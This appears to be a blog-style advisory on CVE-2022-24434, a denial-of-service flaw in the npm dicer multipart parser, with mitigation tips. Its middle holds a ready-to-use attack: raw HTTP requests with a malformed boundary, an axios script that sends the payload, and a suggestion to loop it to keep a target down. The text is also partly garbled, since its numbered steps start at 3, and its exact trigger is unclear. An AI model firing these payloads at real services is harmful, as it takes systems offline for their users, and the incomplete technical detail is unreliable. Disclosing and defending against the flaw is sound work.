If you’re building Node.js services that handle multipart/form-data (often used for file uploads), there’s a good chance you’ve used the dicer package. But did you know an attacker can make your server crash over and over again with a very small, cheap payload? That’s what CVE-2022-24434 is all about.
Let’s break down what this vulnerability is, how it works, and how you can protect your service.
What is Dicer?
Dicer is a popular npm package for parsing multipart/form-data. Most web services that allow users to upload files or images go through this kind of data. Dicer is lightweight and fast, which is why it’s often used in open source projects and production services.
The Heart of the Problem: CVE-2022-24434
CVE-2022-24434 is a vulnerability that affects *all versions* of the dicer package. When dicer receives certain malformed input, it throws an uncaught exception or enters an error state that crashes the entire Node.js process. There is NO built-in protection or graceful handling.
- DoS (Denial-of-Service): A malicious user can POST a single request and take down your service.
- Repeatable: The attacker can send the payload repeatedly, causing your service to be in a constant state of crash/restart.
- No authentication needed: If your endpoint is public, anyone can do this—no special access needed.
3. Dicer tries to process the input, encounters a bug, and throws an uncaught error.
4. Unless you’ve set up special error handling (which most don’t), *your entire Node.js service process crashes*.
5. The attacker can repeat this either manually or with a simple script, and your service goes down every time.
Here is a very basic HTTP request of the kind involved (you can use curl or a simple script for this):

```http
POST /upload HTTP/1.1
Host: your-server.com
Content-Type: multipart/form-data; boundary=malformedboundary

--malformedboundary
Content-Disposition: form-data; name="file"; filename="attack.txt"
Content-Type: text/plain

hacked
--malformedboundary
```
But the trick is to make the boundary malformed (for example, missing the final ending, or having random junk), like this:

```http
POST /upload HTTP/1.1
Host: your-server.com
Content-Type: multipart/form-data; boundary=malformedboundary

--malformedboundary
Content-Disposition: form-data; name="file"; filename="attack.txt"
Content-Type: text/plain

hacked
--malformedboundar
```
Notice the boundary at the end is *misspelled* (missing the "y").
Or using Node.js’s popular axios + form-data:

```javascript
const axios = require('axios');
const FormData = require('form-data');

const form = new FormData();
form.append('file', 'attack', { filename: 'attack.txt' });

const headers = form.getHeaders();
// Override the boundary the form-data library generated, so the header no longer
// matches the body: the server-side parser sees a malformed boundary.
headers['content-type'] = 'multipart/form-data; boundary=malformedboundary';

axios.post('http://your-server.com/upload', form, { headers })
  .then(() => console.log('Payload sent!'))
  .catch(err => console.error('Server might have crashed:', err));
```
Repeat this payload in a loop and you can keep crashing the target service.
What Happens In Node.js
If you haven’t registered an uncaughtException handler, Node.js treats the error dicer throws as fatal and the whole process exits. This is very common in Express-based setups, where multipart upload endpoints simply trust whatever form data is sent.
How To Fix or Mitigate
- Update dicer: Check if a fixed version is available (security advisory here).
- Use robust error handlers: Add try/catch and process.on('uncaughtException', ...) to log and handle unexpected crashes gracefully (though this is a band-aid, not a fix).
- Validate Content-Type: Only accept well-formed Content-Type headers and reject requests that look odd early.
- Rate limit: Make it harder for the attacker to brute-force your endpoint.
- Switch parser: Consider alternatives like busboy or multer if they are not vulnerable or have better support.
References
- NPM Security Advisory
- MITRE CVE Entry
- Dicer on GitHub
- OWASP – Uncaught Exception DoS
Conclusion
CVE-2022-24434 is a reminder that even the smallest, most trusted dependencies can be an attacker’s backdoor. If your app processes file uploads, check your dependencies now, patch dicer, and set up defensive code. Don’t wait for a random crash to be your wake-up call—secure your Node.js services today!
Have more questions? Or seen this in the wild? Let me know in the comments!
Timeline
Published on: 05/20/2022 20:15:00 UTC
Last modified on: 06/07/2022 02:04:00 UTC